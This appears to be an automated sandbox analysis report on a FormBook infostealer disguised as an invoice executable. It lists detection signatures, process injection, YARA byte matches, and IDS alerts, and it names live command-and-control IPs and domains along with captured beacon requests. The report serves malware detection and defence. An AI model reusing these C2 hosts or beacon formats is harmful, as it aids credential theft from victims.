
Windows Analysis Report
COMMERCIAL INVOICES.exe

Overview

General Information

Sample name: COMMERCIAL INVOICES.exe
Analysis ID: 1531665
MD5: 57ccf777596297f30d94bc1394d4b38f
SHA1: 21fecf43b375e8171f96e13d3d88e83fa5f05cb7
SHA256: 29872a0c2ff44faae6e8b1cb4f561978c51a21a195bf545b22e76451521b92d3
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

  • System is w10x64
  • COMMERCIAL INVOICES.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe" MD5: 57CCF777596297F30D94BC1394D4B38F)
    • COMMERCIAL INVOICES.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe" MD5: 57CCF777596297F30D94BC1394D4B38F)
      • oKWoZthfkV.exe (PID: 3472 cmdline: "C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • taskkill.exe (PID: 3524 cmdline: "C:\Windows\SysWOW64\taskkill.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • oKWoZthfkV.exe (PID: 3224 cmdline: "C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5900 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author (matched strings listed under the row)
00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1402f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1402f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author (matched strings listed under the row)
4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.COMMERCIAL INVOICES.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.COMMERCIAL INVOICES.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e233:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-11T15:09:27.764958+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49958 | 154.23.184.95 | 80 | TCP
2024-10-11T15:09:51.371879+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49989 | 172.67.218.106 | 80 | TCP
2024-10-11T15:10:05.167434+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49993 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:18.378066+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:32.372952+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50001 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:45.986721+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50005 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:59.855693+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50009 | 104.21.42.219 | 80 | TCP
2024-10-11T15:11:13.124797+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50013 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:27.797965+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50017 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:41.819632+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50021 | 199.59.243.227 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-11T15:09:27.764958+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49958 | 154.23.184.95 | 80 | TCP
2024-10-11T15:09:51.371879+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49989 | 172.67.218.106 | 80 | TCP
2024-10-11T15:10:05.167434+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49993 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:18.378066+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:32.372952+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50001 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:45.986721+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50005 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:59.855693+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 104.21.42.219 | 80 | TCP
2024-10-11T15:11:13.124797+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50013 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:27.797965+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:41.819632+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 199.59.243.227 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-11T15:09:43.699694+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49986 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:46.253121+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:48.782424+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49988 | 172.67.218.106 | 80 | TCP
2024-10-11T15:09:57.535649+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:00.055484+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49991 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:02.659949+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49992 | 74.48.31.123 | 80 | TCP
2024-10-11T15:10:11.586690+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49994 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:13.225240+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49995 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:16.679158+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49996 | 3.33.130.190 | 80 | TCP
2024-10-11T15:10:24.685844+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:27.259005+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49999 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:29.825861+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50000 | 206.119.82.147 | 80 | TCP
2024-10-11T15:10:39.116174+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50002 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:41.662948+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50003 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:44.209821+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50004 | 85.159.66.93 | 80 | TCP
2024-10-11T15:10:51.990952+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50006 | 104.21.42.219 | 80 | TCP
2024-10-11T15:10:54.548858+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50007 | 104.21.42.219 | 80 | TCP
2024-10-11T15:10:57.285260+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50008 | 104.21.42.219 | 80 | TCP
2024-10-11T15:11:05.517765+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50010 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:08.065487+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50011 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:10.655682+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 162.0.225.218 | 80 | TCP
2024-10-11T15:11:19.131316+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50014 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:21.725813+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50015 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:24.406502+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 103.249.106.91 | 80 | TCP
2024-10-11T15:11:34.182415+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 199.59.243.227 | 80 | TCP
2024-10-11T15:11:36.729656+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 199.59.243.227 | 80 | TCP
2024-10-11T15:11:39.296563+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 199.59.243.227 | 80 | TCP


            AV Detection

Source: COMMERCIAL INVOICES.exe | ReversingLabs: Detection: 60%
Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: COMMERCIAL INVOICES.exe | Joe Sandbox ML: detected
Source: COMMERCIAL INVOICES.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: COMMERCIAL INVOICES.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oKWoZthfkV.exe, 00000005.00000000.2455201096.000000000006E000.00000002.00000001.01000000.0000000C.sdmp, oKWoZthfkV.exe, 00000009.00000000.2612639355.000000000006E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: COMMERCIAL INVOICES.exe, COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_0086C3E0 FindFirstFileW,FindNextFileW,FindClose, | 6_2_0086C3E0
Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4x nop then jmp 0713607Bh | 0_2_07135EB0
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 4x nop then xor eax, eax | 6_2_00859BF0
Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_04A404DE

            Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50001 -> 206.119.82.147:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 206.119.82.147:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50005 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49993 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50005 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 172.67.218.106:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 206.119.82.147:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50001 -> 206.119.82.147:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 162.0.225.218:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49958 -> 154.23.184.95:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49958 -> 154.23.184.95:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 162.0.225.218:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 172.67.218.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 104.21.42.219:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49989 -> 172.67.218.106:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49989 -> 172.67.218.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 206.119.82.147:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50017 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50017 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 162.0.225.218:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 104.21.42.219:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49997 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49997 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 172.67.218.106:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50013 -> 162.0.225.218:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 162.0.225.218:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 104.21.42.219:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50021 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50021 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50009 -> 104.21.42.219:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 104.21.42.219:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 74.48.31.123:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 199.59.243.227:80
            Source: DNS query: www.nibcorp.xyz
            Source: DNS query: www.meramhaliyikama.xyz
            Source: DNS query: www.5711337.xyz
Source: Joe Sandbox View | IP Address: 3.33.130.190 3.33.130.190
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /0fcg/?KteDo=fX0Hm8kxa&BHNhDJjp=hJPFsW9wVXXSmVQNX9HyPUqpnWaGwoAwUQqBAOekg/iA3H1k+2o0va3fZiXrpa/qEBgAqlFBPzvmzQvG7thcdV/HiwU/gazVS6QU6A3e7YzcCqqFBxHno6Fx/WWCMuQjEQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.wcr5.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /t97r/?BHNhDJjp=fU68x3PRULyXXLX18Be8OZjG7cRSBQSavMkIge0xVdkIxqx/cDskQThzDXmmTxAsHWtrBQPcDxz3o7UBkP1yUbLOTohuYgETqqTp8AigyDVY+hGioDWRRBsptVM6QvNfSQ==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.syncsnode.net | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /fxh3/?BHNhDJjp=TcdD1jH1CapNlBILQUUL6VPJeSSLh+pbMYQjXnoycmFxozx0bMDFjxvRFdG/tU/CFYGPAPKB1FL/Z2VQy4rjs+2Q8knST/5l8EVmCJfQbrXwTzWaySbdQJ1HTeqiGlwgAw==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.facaicloud.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /qy56/?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.nibcorp.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
